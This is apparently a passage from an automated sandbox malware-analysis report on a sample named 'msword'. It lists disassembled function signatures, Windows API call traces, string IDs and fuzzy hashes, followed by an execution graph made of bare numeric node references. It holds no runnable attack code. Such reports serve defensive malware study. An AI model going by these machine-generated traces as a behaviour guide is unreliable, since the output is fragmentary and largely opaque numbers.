                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                    • String ID: CopyFiles "%s"->"%s"
                                                                    • API String ID: 2577523808-3778932970
                                                                    • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                    • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                                    • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                    • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcatwsprintf
                                                                    • String ID: %02x%c$...
                                                                    • API String ID: 3065427908-1057055748
                                                                    • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                    • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                                    • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                    • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                                    APIs
                                                                    • OleInitialize.OLE32(00000000), ref: 00405057
                                                                      • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                    • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                    • String ID: Section: "%s"$Skipping section: "%s"
                                                                    • API String ID: 2266616436-4211696005
                                                                    • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                    • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                                    • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                    • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                                    APIs
                                                                    • GetDC.USER32(?), ref: 00402100
                                                                    • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                    • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                                      • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                    • String ID:
                                                                    • API String ID: 1599320355-0
                                                                    • Opcode ID: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
                                                                    • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                                    • Opcode Fuzzy Hash: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
                                                                    • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                                    APIs
                                                                      • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                    • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                                    • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                                    • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcpyn$CreateFilelstrcmp
                                                                    • String ID: Version
                                                                    • API String ID: 512980652-315105994
                                                                    APIs
                                                                    • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                                    • GetTickCount.KERNEL32 ref: 00403303
                                                                    • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                    • String ID:
                                                                    • API String ID: 2102729457-0
                                                                    APIs
                                                                    • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                                    • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                    • String ID:
                                                                    • API String ID: 2883127279-0
                                                                    APIs
                                                                    • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                    • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfileStringlstrcmp
                                                                    • String ID: !N~
                                                                    • API String ID: 623250636-529124213
                                                                    APIs
                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                    • CloseHandle.KERNEL32(?), ref: 00405C71
                                                                    Strings
                                                                    • Error launching installer, xrefs: 00405C48
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateHandleProcess
                                                                    • String ID: Error launching installer
                                                                    • API String ID: 3712363035-66219284
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                    • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                      • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandlelstrlenwvsprintf
                                                                    • String ID: RMDir: RemoveDirectory invalid input("")
                                                                    • API String ID: 3509786178-2769509956
                                                                    APIs
                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                    • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                                    • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                                    • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 190613189-0

                                                                    Execution Graph

                                                                    Execution Coverage:2.9%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:3.4%
                                                                    Total number of Nodes:2000
                                                                    Total number of Limit Nodes:70
102510->102511 102512 cb57fe 102510->102512 103397 c76ba4 102511->103397 102514 c9014b 22 API calls 102512->102514 102516 cb5808 _wcslen 102514->102516 102515 c76b9e 102519 c77bb5 22 API calls 102515->102519 102517 c9017b 22 API calls 102516->102517 102518 cb5841 __fread_nolock 102517->102518 102519->102350 102522 c9014b 102520->102522 102523 c9016a 102522->102523 102527 c9016c 102522->102527 102540 c9ed7c 102522->102540 102547 c9521d 7 API calls 2 library calls 102522->102547 102523->102362 102525 c909dd 102549 c93614 RaiseException 102525->102549 102527->102525 102548 c93614 RaiseException 102527->102548 102528 c909fa 102528->102362 102533 c90150 102530->102533 102531 c9ed7c ___std_exception_copy 21 API calls 102531->102533 102532 c9016a 102532->102364 102533->102531 102533->102532 102536 c9016c 102533->102536 102552 c9521d 7 API calls 2 library calls 102533->102552 102535 c909dd 102554 c93614 RaiseException 102535->102554 102536->102535 102553 c93614 RaiseException 102536->102553 102538 c909fa 102538->102364 102545 ca3b93 _abort 102540->102545 102541 ca3bd1 102551 c9f649 20 API calls _abort 102541->102551 102543 ca3bbc RtlAllocateHeap 102544 ca3bcf 102543->102544 102543->102545 102544->102522 102545->102541 102545->102543 102550 c9521d 7 API calls 2 library calls 102545->102550 102547->102522 102548->102525 102549->102528 102550->102545 102551->102544 102552->102533 102553->102535 102554->102538 102556 c763e4 __wsopen_s 102555->102556 102557 c78577 22 API calls 102556->102557 102558 c76416 102556->102558 102557->102558 102568 c7644c 102558->102568 102624 c7655e 102558->102624 102560 c7b329 22 API calls 102561 c76543 102560->102561 102564 c76a7c 22 API calls 102561->102564 102562 c7b329 22 API calls 102562->102568 102563 c7655e 22 API calls 102563->102568 102565 c7654f 102564->102565 102565->102369 102567 c7651a 102567->102560 102567->102565 102568->102562 102568->102563 102568->102567 102627 c76a7c 102568->102627 102570 c75021 102569->102570 102571 c7bd71 
102569->102571 102575 c7bed9 102570->102575 102572 c9014b 22 API calls 102571->102572 102573 c7bd7b 102572->102573 102574 c9017b 22 API calls 102573->102574 102574->102570 102576 c7befc __fread_nolock 102575->102576 102577 c7beed 102575->102577 102576->102373 102577->102576 102578 c9017b 22 API calls 102577->102578 102578->102576 102580 c9014b 22 API calls 102579->102580 102581 c75038 102580->102581 102581->102376 102583 c7be38 102582->102583 102584 c7be67 102583->102584 102639 c7bfa5 40 API calls 102583->102639 102584->102379 102587 c751d4 102586->102587 102588 c751f2 102586->102588 102589 c750b4 102587->102589 102591 c7bed9 22 API calls 102587->102591 102590 c78577 22 API calls 102588->102590 102592 c94d98 102589->102592 102590->102589 102591->102589 102593 c94e1b 102592->102593 102594 c94da6 102592->102594 102642 c94e2d 40 API calls 3 library calls 102593->102642 102601 c94dcb 102594->102601 102640 c9f649 20 API calls _abort 102594->102640 102597 c94e28 102597->102389 102598 c94db2 102641 ca2b5c 26 API calls _abort 102598->102641 102600 c94dbd 102600->102389 102601->102389 102603 c77e1a 102602->102603 102604 c9014b 22 API calls 102603->102604 102605 c77e28 102604->102605 102643 c78445 102605->102643 102608 c78470 102646 c7c760 102608->102646 102610 c78480 102611 c9017b 22 API calls 102610->102611 102612 c7514c 102610->102612 102611->102612 102613 c78a60 102612->102613 102614 c78a76 102613->102614 102615 cb6737 102614->102615 102621 c78a80 102614->102621 102655 c8b7a2 22 API calls 102615->102655 102617 cb6744 102656 c7b4c8 22 API calls 102617->102656 102619 c78b9b 102619->102430 102620 cb6762 102620->102620 102621->102617 102621->102619 102622 c78b94 102621->102622 102623 c9014b 22 API calls 102622->102623 102623->102619 102633 c7c2c9 102624->102633 102626 c76569 102626->102558 102628 c76a8b 102627->102628 102632 c76aac __fread_nolock 102627->102632 102630 c9017b 22 API calls 102628->102630 102629 c9014b 22 API calls 102631 c76abf 102629->102631 102630->102632 
102631->102568 102632->102629 102634 c7c2dc 102633->102634 102638 c7c2d9 __fread_nolock 102633->102638 102635 c9014b 22 API calls 102634->102635 102636 c7c2e7 102635->102636 102637 c9017b 22 API calls 102636->102637 102637->102638 102638->102626 102639->102584 102640->102598 102641->102600 102642->102597 102644 c9014b 22 API calls 102643->102644 102645 c7513e 102644->102645 102645->102608 102647 c7c76b 102646->102647 102648 cc1285 102647->102648 102653 c7c773 ISource 102647->102653 102649 c9014b 22 API calls 102648->102649 102650 cc1291 102649->102650 102651 c7c77a 102651->102610 102653->102651 102654 c7c7e0 22 API calls ISource 102653->102654 102654->102653 102655->102617 102656->102620 102715 cb22d0 102657->102715 102660 c7587d 102662 c78577 22 API calls 102660->102662 102661 c75898 102663 c7bd57 22 API calls 102661->102663 102664 c75889 102662->102664 102663->102664 102717 c755dc 102664->102717 102667 c73a57 102668 cb22d0 __wsopen_s 102667->102668 102669 c73a64 GetLongPathNameW 102668->102669 102670 c78577 22 API calls 102669->102670 102671 c73a8c 102670->102671 102672 c753f2 102671->102672 102673 c7bf73 22 API calls 102672->102673 102674 c75404 102673->102674 102675 c75851 23 API calls 102674->102675 102676 c7540f 102675->102676 102677 cb4d5b 102676->102677 102678 c7541a 102676->102678 102683 cb4d7d 102677->102683 102731 c8e36b 41 API calls 102677->102731 102679 c76a7c 22 API calls 102678->102679 102681 c75426 102679->102681 102725 c71340 102681->102725 102684 c75439 102684->102446 102732 c76679 102685->102732 102688 cb5336 102857 ce36b8 102688->102857 102689 c76679 94 API calls 102691 c7630e 102689->102691 102691->102688 102693 c76316 102691->102693 102692 cb5347 102694 cb534b 102692->102694 102695 cb5368 102692->102695 102698 c76322 102693->102698 102699 cb5353 102693->102699 102906 c766e7 102694->102906 102697 c9017b 22 API calls 102695->102697 102706 cb53ad 102697->102706 102754 c73b39 102698->102754 102912 cde30e 82 API calls 102699->102912 102702 cb5361 
102702->102695 102704 cb555e 102710 cb5566 102704->102710 102705 c766e7 68 API calls 102705->102710 102706->102704 102706->102710 102712 c7b329 22 API calls 102706->102712 102883 cd9ff8 102706->102883 102886 ce1519 102706->102886 102892 c7bba9 102706->102892 102900 c75d21 102706->102900 102913 cd9f27 42 API calls _wcslen 102706->102913 102710->102705 102914 cda215 82 API calls __wsopen_s 102710->102914 102712->102706 102716 c7585e GetFullPathNameW 102715->102716 102716->102660 102716->102661 102718 c755ea 102717->102718 102721 c7adf4 102718->102721 102720 c73ac4 102720->102667 102722 c7ae02 102721->102722 102723 c7ae0b __fread_nolock 102721->102723 102722->102723 102724 c7c2c9 22 API calls 102722->102724 102723->102720 102723->102723 102724->102723 102726 c71352 102725->102726 102730 c71371 __fread_nolock 102725->102730 102728 c9017b 22 API calls 102726->102728 102727 c9014b 22 API calls 102729 c71388 102727->102729 102728->102730 102729->102684 102730->102727 102731->102677 102915 c7663e LoadLibraryA 102732->102915 102737 cb5648 102739 c766e7 68 API calls 102737->102739 102738 c766a4 LoadLibraryExW 102923 c76607 LoadLibraryA 102738->102923 102741 cb564f 102739->102741 102743 c76607 3 API calls 102741->102743 102745 cb5657 102743->102745 102944 c7684a 102745->102944 102746 c766ce 102746->102745 102747 c766da 102746->102747 102748 c766e7 68 API calls 102747->102748 102750 c762fa 102748->102750 102750->102688 102750->102689 102753 cb567e 102755 cb415f 102754->102755 102756 c73b62 102754->102756 103201 cda215 82 API calls __wsopen_s 102755->103201 102758 c9017b 22 API calls 102756->102758 102759 c73b86 102758->102759 102760 c77aab CloseHandle 102759->102760 102761 c73b94 102760->102761 102762 c7bf73 22 API calls 102761->102762 102765 c73b9d 102762->102765 102763 c73bfa 102766 c7bf73 22 API calls 102763->102766 102764 c73bec 102764->102763 102767 cb4179 102764->102767 103202 cdd5aa SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 102764->103202 102768 
c77aab CloseHandle 102765->102768 102769 c73c06 102766->102769 102767->102763 102767->102764 102770 c73ba6 102768->102770 103171 c73ae9 102769->103171 102773 c77aab CloseHandle 102770->102773 102776 c73baf 102773->102776 102774 cb41d5 102774->102763 103189 c76fa2 SetFilePointerEx SetFilePointerEx SetFilePointerEx CreateFileW CreateFileW 102776->103189 102777 c7bf73 22 API calls 102779 c73c1e 102777->102779 102781 c75851 23 API calls 102779->102781 102780 c73bc9 102782 c73bd1 102780->102782 102783 cb4591 102780->102783 102785 c73c2c 102781->102785 103190 c76c5f 27 API calls ISource 102782->103190 103214 cda215 82 API calls __wsopen_s 102783->103214 103176 c73b1c 102785->103176 102786 cb45a6 102786->102786 102791 c73be3 103191 c76c48 SetFilePointerEx SetFilePointerEx SetFilePointerEx 102791->103191 102794 c73c6f 102796 c7bf73 22 API calls 102794->102796 102795 cb41eb 102797 c77aab CloseHandle 102795->102797 102798 c73c78 102796->102798 102799 cb41f4 102797->102799 102800 c7bf73 22 API calls 102798->102800 102801 c76679 94 API calls 102799->102801 102802 c73c81 102800->102802 102803 cb421c 102801->102803 103192 c7568e 22 API calls 102802->103192 102805 cb4528 102803->102805 102808 ce36b8 80 API calls 102803->102808 103211 cda215 82 API calls __wsopen_s 102805->103211 102806 c73c98 103193 c77bb5 22 API calls 102806->103193 102810 cb423b 102808->102810 102812 c766e7 68 API calls 102810->102812 102811 c73ca9 SetCurrentDirectoryW 102816 c73cbc 102811->102816 102813 cb4249 102812->102813 102813->102805 102814 cb4251 102813->102814 102815 c9014b 22 API calls 102814->102815 102817 c9017b 22 API calls 102816->102817 102819 c73ccf 102817->102819 102822 c73e5c 102836 c73e2a ISource 103185 c77aab 102836->103185 102856 cb4516 102856->102836 102858 ce36d4 102857->102858 102859 c76874 64 API calls 102858->102859 102860 ce36e8 102859->102860 103223 ce3827 102860->103223 102863 c7684a 40 API calls 102864 ce3717 102863->102864 102865 c7684a 40 API calls 102864->102865 102866 ce3727 
102865->102866 102867 c7684a 40 API calls 102866->102867 102868 ce3742 102867->102868 102869 c7684a 40 API calls 102868->102869 102870 ce375d 102869->102870 102871 c76874 64 API calls 102870->102871 102872 ce3774 102871->102872 102873 c9ed7c ___std_exception_copy 21 API calls 102872->102873 102874 ce377b 102873->102874 102875 c9ed7c ___std_exception_copy 21 API calls 102874->102875 102876 ce3785 102875->102876 102877 c7684a 40 API calls 102876->102877 102878 ce3799 102877->102878 102879 ce32bd 27 API calls 102878->102879 102880 ce37af 102879->102880 102882 ce3700 102880->102882 103229 ce2c8d 102880->103229 102882->102692 102884 c9017b 22 API calls 102883->102884 102885 cda028 __fread_nolock 102884->102885 102885->102706 102887 ce1524 102886->102887 102888 c9014b 22 API calls 102887->102888 102889 ce153b 102888->102889 102890 c7b329 22 API calls 102889->102890 102891 ce1546 102890->102891 102891->102706 102893 c7bc33 102892->102893 102899 c7bbb9 __fread_nolock 102892->102899 102895 c9017b 22 API calls 102893->102895 102894 c9014b 22 API calls 102896 c7bbc0 102894->102896 102895->102899 102897 c7bbde 102896->102897 102898 c9014b 22 API calls 102896->102898 102897->102706 102898->102897 102899->102894 102901 c75d34 102900->102901 102903 c75dd8 102900->102903 102902 c9017b 22 API calls 102901->102902 102905 c75d66 102901->102905 102902->102905 102903->102706 102904 c9014b 22 API calls 102904->102905 102905->102903 102905->102904 102907 c766f1 102906->102907 102909 c766f8 102906->102909 102908 c9e9e8 67 API calls 102907->102908 102908->102909 102910 c7670f 102909->102910 102911 cb56a4 FreeLibrary 102909->102911 102910->102699 102912->102702 102913->102706 102914->102710 102916 c76656 GetProcAddress 102915->102916 102917 c76674 102915->102917 102918 c76666 102916->102918 102920 c9e95b 102917->102920 102918->102917 102919 c7666d FreeLibrary 102918->102919 102919->102917 102952 c9e89a 102920->102952 102922 c76698 102922->102737 102922->102738 102924 c7661c GetProcAddress 
102923->102924 102925 c7663b 102923->102925 102926 c7662c 102924->102926 102928 c76720 102925->102928 102926->102925 102927 c76634 FreeLibrary 102926->102927 102927->102925 102929 c9017b 22 API calls 102928->102929 102930 c76735 102929->102930 103004 c7423c 102930->103004 102932 c76741 __fread_nolock 102933 cb56c2 102932->102933 102938 c7677c 102932->102938 103012 ce3a0e CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 102932->103012 103013 ce3a92 74 API calls 102933->103013 102936 c7684a 40 API calls 102936->102938 102937 c76810 ISource 102937->102746 102938->102936 102938->102937 102940 cb5706 102938->102940 102941 c76874 64 API calls 102938->102941 103007 c76874 102940->103007 102941->102938 102943 c7684a 40 API calls 102943->102937 102945 cb5760 102944->102945 102946 c7685c 102944->102946 103045 c9ec34 102946->103045 102949 ce32bd 103154 ce310d 102949->103154 102951 ce32d8 102951->102753 102955 c9e8a6 CallCatchBlock 102952->102955 102953 c9e8b4 102977 c9f649 20 API calls _abort 102953->102977 102955->102953 102957 c9e8e4 102955->102957 102956 c9e8b9 102978 ca2b5c 26 API calls _abort 102956->102978 102959 c9e8e9 102957->102959 102960 c9e8f6 102957->102960 102979 c9f649 20 API calls _abort 102959->102979 102969 ca83e1 102960->102969 102963 c9e8ff 102965 c9e912 102963->102965 102966 c9e905 102963->102966 102964 c9e8c4 __fread_nolock 102964->102922 102981 c9e944 LeaveCriticalSection __fread_nolock 102965->102981 102980 c9f649 20 API calls _abort 102966->102980 102970 ca83ed CallCatchBlock 102969->102970 102982 ca32d1 EnterCriticalSection 102970->102982 102972 ca83fb 102983 ca847b 102972->102983 102976 ca842c __fread_nolock 102976->102963 102977->102956 102978->102964 102979->102964 102980->102964 102981->102964 102982->102972 102991 ca849e 102983->102991 102984 ca84f7 102985 ca4ff0 _abort 20 API calls 102984->102985 102986 ca8500 102985->102986 102988 ca2d38 _free 20 API calls 102986->102988 102989 ca8509 102988->102989 102990 ca8408 
